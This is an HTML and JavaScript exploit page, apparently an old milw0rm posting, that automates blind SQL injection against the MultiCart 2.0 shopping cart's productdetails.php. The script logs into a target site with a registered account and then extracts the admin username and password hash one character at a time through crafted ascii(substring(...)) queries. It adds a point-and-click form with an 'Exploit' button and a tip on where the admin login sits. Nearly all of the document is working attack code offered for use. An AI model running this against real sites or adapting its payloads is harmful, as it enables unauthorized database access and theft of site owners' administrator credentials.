<html>
<head>
<style type="text/css">
<!--
.style1{color: #CC0000}
.style2 { color: #000000; font-size: 12px;}
.style3 {color: #FF0000; font-weight: bold; font-size: 12px; }
.style4 {color: #FF0000; font-size: 10px;}
-->
</style>
<title>MultiCart 2.0 Remote SQL Injection Vulnerbility</title>
<script language="Javascript" type="text/javascript">
/*
-------------------------------------------------------------------------------
- MultiCart Blind SQL Injection Exploit (productdetails.php) -
- Info ----------------------------------------------------------------------
- SAVE AS exploit.HTML and RUN in FIREFOX -----------------
- Author: t0pP8uZz & xprog -------------------------------------------
- Exploit Coded By t0pP8uZz -----------------------------------------
- Site: h4ck-y0u.org / milw0rm.com ---------------------------------
------------------------------------------------------------------------------
- Needs Registration First! ------------------------------------
- Peace --------------------------------------------------------------------
------------------------------------------------------------------------------
*/
var site, user, pass, tbl, pid, res = "";
function Start() {
site = document.getElementById("site").value;
user = document.getElementById("user").value;
pass = document.getElementById("pass").value;
tbl = document.getElementById("tbl").value;
pid = document.getElementById("pid").value;
Login();
Main(1, 48);
}
function Main(substr, num) {
var url = site+"/productdetails.php?productid="+pid+"%20and%20ascii(substring((SELECT concat(admin_name,0x3a,admin_password) FROM "+tbl+"),"+substr+",1))="+num+"/*";
netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function() {
if(xmlhttp.readyState == 4) {
var content = xmlhttp.responseText;
if(content.match(/doesn't exist/i)) { alert("Table '"+tbl+"' Doesnt Exist! Try Another.."); return false; }
var ele = document.getElementById("output");
if(!content.match(/SQL syntax/i)) { res += String.fromCharCode((num)); ele.value = res; num = 48; substr++; }
else { if(num == 59) { num = 96; } else { num++; }}
if(res.match(":")) {
var check = res.split(":");
if(check[1].length >= 32) { alert("Site Exploited! Admin Details: "+res); return true;}
}
Main(substr, num);
}
};
xmlhttp.open("GET", url, true);
xmlhttp.send(null);
};
function Login() {
var data = 'txtUserName='+user+'&txtPassword='+pass+'&loginbox=+';
netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
try {
var xmlhttp = new XMLHttpRequest();
}
catch(e) { alert("Use Firefox!\n\n\nError: " + e.description); }
xmlhttp.open("POST", site + "/index.php", true);
xmlhttp.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9");
xmlhttp.setRequestHeader("Content-Length", data.length);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send(data);
};
</script>
</head>
<body>
<p class="style1">- MultiCart 2.0 Remote Blind SQL Injection Vulnerbility -</p>
<p class="style2">Site: <input type="text" id="site" /> (URL to multicart site ie: http://www.site.com/multicart)</p>
<p class="style2">Table: <input type="text" id="tbl" /> (settings table name, default: "multicart_settings" others used: "mc_settings", "settings")</p>
<p class="style2">User: <input type="text" id="user" /> (Register on the site first, then enter username here)</p>
<p class="style2">Pass: <input type="text" id="pass" /> (Register on the site first, then enter password here)</p>
<p class="style2">PID: <input type="text" id="pid" /> (a valid product ID)</p>
<p class="style2"><input type="button" onclick="Start();" id="button" value="Exploit" /></p>
<p class="style3">Output: <input type="text" id="output" size="100" /></p>
<p class="style2">Notes: MultiCart uses the MD5 algorithms, The admin login is at /admin/</p>
<p class="style4">Coded By t0pP8uZz - h4ck-y0u.org</p>
</body>
</html>
# milw0rm.com [2008-02-20]
